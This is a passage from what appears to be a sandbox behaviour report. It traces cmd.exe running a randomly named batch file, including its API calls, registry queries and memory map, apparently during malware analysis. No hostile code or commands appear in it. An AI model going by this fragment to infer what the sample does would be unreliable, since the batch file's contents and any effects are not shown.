lpBuffer=0x140a960*, lpNumberOfBytesRead=0xcdf48c*=0x0, lpOverlapped=0x0) returned 1 [0296.958] GetLastError () returned 0x0 [0296.958] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.958] GetFileType (hFile=0xb8) returned 0x1 [0296.958] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.958] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.959] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.959] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.959] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xcdf48c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xcdf48c*=0x0, lpOverlapped=0x0) returned 1 [0296.959] GetLastError () returned 0x0 [0296.959] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.959] GetFileType (hFile=0xb8) returned 0x1 [0296.959] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.959] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.959] longjmp () [0296.959] _tell (_FileHandle=3) returned 226 [0296.959] _close (_FileHandle=3) returned 0 [0296.959] CmdBatNotificationStub () returned 0x1 [0296.959] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.959] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.960] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.960] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.979] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.979] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0297.106] SetConsoleInputExeNameW () returned 0x1 [0297.107] GetConsoleOutputCP () returned 0x1b5 [0297.288] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.288] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.364] exit (_Code=0) Thread: id = 836 os_tid = 0xf08 Process: id = "82" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2105d000" os_pid = "0xeac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Journal.exe\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4356 start_va = 0xa30000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 4357 start_va = 0xa50000 end_va = 0xa51fff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 4358 start_va = 0xa60000 end_va = 0xa73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 4359 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 4360 start_va = 0xac0000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 4361 start_va = 0xbc0000 end_va = 0xbc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 4362 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4363 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 4364 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4365 start_va = 0x7f130000 end_va = 0x7f152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f130000" filename = "" Region: id = 4366 start_va = 0x7f15b000 end_va = 0x7f15dfff entry_point = 0x0 region_type = private name = "private_0x000000007f15b000" filename = "" Region: id = 4367 start_va = 0x7f15e000 end_va = 0x7f15efff entry_point = 0x0 region_type = private name = "private_0x000000007f15e000" filename = "" Region: id = 4368 start_va = 0x7f15f000 end_va = 0x7f15ffff entry_point = 0x0 region_type = private name = "private_0x000000007f15f000" filename = "" Region: id = 4369 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4370 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4371 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 4372 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4373 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 4374 start_va = 0xbd0000 end_va = 0xbd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 4375 start_va = 0xbe0000 end_va = 0xbe1fff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 5962 start_va = 0xbf0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 5963 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5964 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5965 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5966 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5967 start_va = 0xc00000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 6008 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6009 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6010 start_va = 0xa30000 end_va = 0xa3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 6011 start_va = 0x7f030000 end_va = 0x7f12ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f030000" filename = "" Region: id = 6521 start_va = 0xc00000 end_va = 0xcbdfff entry_point = 0xc00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6522 start_va = 0xd10000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 6523 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6524 start_va = 0xcc0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 6525 start_va = 0xe10000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 6526 start_va = 0xf10000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 6527 start_va = 0x7f158000 end_va = 0x7f15afff entry_point = 0x0 region_type = private name = "private_0x000000007f158000" filename = "" Region: id = 6528 start_va = 0xa40000 end_va = 0xa43fff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 6665 start_va = 0xa50000 end_va = 0xa53fff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 6688 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 6689 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6690 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6691 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6692 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6693 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6694 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6695 start_va = 0xd00000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 6704 start_va = 0x1070000 end_va = 0x13a6fff entry_point = 0x1070000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 791 os_tid = 0xeb0 [0264.657] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0264.657] __set_app_type (_Type=0x1) [0264.657] __p__fmode () returned 0x77984d6c [0264.657] __p__commode () returned 0x77985b1c [0264.657] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0264.657] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0264.657] GetCurrentThreadId () returned 0xeb0 [0264.658] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb0) returned 0x84 [0264.658] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0264.658] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0264.658] SetThreadUILanguage (LangId=0x0) returned 0x409 [0264.718] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0264.718] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xbbf9e4 | out: phkResult=0xbbf9e4*=0x0) returned 0x2 [0264.718] VirtualQuery (in: lpAddress=0xbbf9eb, lpBuffer=0xbbf99c, dwLength=0x1c | out: lpBuffer=0xbbf99c*(BaseAddress=0xbbf000, AllocationBase=0xac0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0264.718] VirtualQuery (in: lpAddress=0xac0000, lpBuffer=0xbbf99c, dwLength=0x1c | out: lpBuffer=0xbbf99c*(BaseAddress=0xac0000, AllocationBase=0xac0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0264.718] VirtualQuery (in: lpAddress=0xac1000, lpBuffer=0xbbf99c, dwLength=0x1c | out: lpBuffer=0xbbf99c*(BaseAddress=0xac1000, AllocationBase=0xac0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0264.718] VirtualQuery (in: lpAddress=0xac3000, lpBuffer=0xbbf99c, dwLength=0x1c | out: lpBuffer=0xbbf99c*(BaseAddress=0xac3000, AllocationBase=0xac0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0264.718] VirtualQuery (in: lpAddress=0xbc0000, lpBuffer=0xbbf99c, dwLength=0x1c | out: lpBuffer=0xbbf99c*(BaseAddress=0xbc0000, AllocationBase=0xbc0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0264.718] GetConsoleOutputCP () returned 0x1b5 [0264.746] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0264.747] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0264.747] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.747] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0264.771] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.771] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0264.774] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.774] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0264.779] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.779] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0264.800] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.800] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0264.812] GetEnvironmentStringsW () returned 0xd17e88* [0264.812] FreeEnvironmentStringsA (penv="A") returned 1 [0264.812] GetEnvironmentStringsW () returned 0xd17e88* [0264.812] FreeEnvironmentStringsA (penv="A") returned 1 [0264.812] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xbbe948 | out: phkResult=0xbbe948*=0x94) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x0, lpData=0xbbe954*=0xd5, lpcbData=0xbbe950*=0x1000) returned 0x2 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x4, lpData=0xbbe954*=0x1, lpcbData=0xbbe950*=0x4) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x0, lpData=0xbbe954*=0x1, lpcbData=0xbbe950*=0x1000) returned 0x2 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x4, lpData=0xbbe954*=0x0, lpcbData=0xbbe950*=0x4) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x4, lpData=0xbbe954*=0x40, lpcbData=0xbbe950*=0x4) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x4, lpData=0xbbe954*=0x40, lpcbData=0xbbe950*=0x4) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x0, lpData=0xbbe954*=0x40, lpcbData=0xbbe950*=0x1000) returned 0x2 [0264.812] RegCloseKey (hKey=0x94) returned 0x0 [0264.812] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xbbe948 | out: phkResult=0xbbe948*=0x94) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x0, lpData=0xbbe954*=0x40, lpcbData=0xbbe950*=0x1000) returned 0x2 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x4, lpData=0xbbe954*=0x1, lpcbData=0xbbe950*=0x4) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x0, lpData=0xbbe954*=0x1, lpcbData=0xbbe950*=0x1000) returned 0x2 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x4, lpData=0xbbe954*=0x0, lpcbData=0xbbe950*=0x4) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x4, lpData=0xbbe954*=0x9, lpcbData=0xbbe950*=0x4) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x4, lpData=0xbbe954*=0x9, lpcbData=0xbbe950*=0x4) returned 0x0 [0264.812] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xbbe94c, lpData=0xbbe954, lpcbData=0xbbe950*=0x1000 | out: lpType=0xbbe94c*=0x0, lpData=0xbbe954*=0x9, lpcbData=0xbbe950*=0x1000) returned 0x2 [0264.813] RegCloseKey (hKey=0x94) returned 0x0 [0264.813] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43291 [0264.813] srand (_Seed=0x5bb43291) [0264.813] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Journal.exe\"\"" [0264.813] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Journal.exe\"\"" [0264.813] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0264.813] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd17e90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0264.813] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0264.813] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0264.813] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0264.813] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0264.813] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0264.813] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0264.813] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0264.813] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0264.813] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0264.813] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0264.813] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0264.813] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0264.813] GetEnvironmentStringsW () returned 0xd180a0* [0264.814] FreeEnvironmentStringsA (penv="A") returned 1 [0264.814] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0264.814] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0264.814] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0264.814] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0264.814] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0264.814] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0264.814] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0264.814] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0264.814] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0264.814] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0264.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbbf720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0264.814] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xbbf720, lpFilePart=0xbbf718 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbbf718*="Desktop") returned 0x1d [0264.814] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0265.726] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xbbf4a0 | out: lpFindFileData=0xbbf4a0) returned 0xd105c8 [0265.726] FindClose (in: hFindFile=0xd105c8 | out: hFindFile=0xd105c8) returned 1 [0265.726] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xbbf4a0 | out: lpFindFileData=0xbbf4a0) returned 0xd105c8 [0265.726] FindClose (in: hFindFile=0xd105c8 | out: hFindFile=0xd105c8) returned 1 [0265.726] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0265.726] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xbbf4a0 | out: lpFindFileData=0xbbf4a0) returned 0xd105c8 [0265.726] FindClose (in: hFindFile=0xd105c8 | out: hFindFile=0xd105c8) returned 1 [0265.726] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0265.726] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0265.726] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0265.726] GetEnvironmentStringsW () returned 0xd180a0* [0265.727] FreeEnvironmentStringsA (penv="=") returned 1 [0265.727] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0265.727] GetConsoleOutputCP () returned 0x1b5 [0265.931] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0265.931] GetUserDefaultLCID () returned 0x409 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xbbf850, cchData=128 | out: lpLCData="0") returned 2 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xbbf850, cchData=128 | out: lpLCData="0") returned 2 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xbbf850, cchData=128 | out: lpLCData="1") returned 2 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0265.931] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0265.932] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0265.932] GetConsoleTitleW (in: lpConsoleTitle=0xd1a978, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.028] 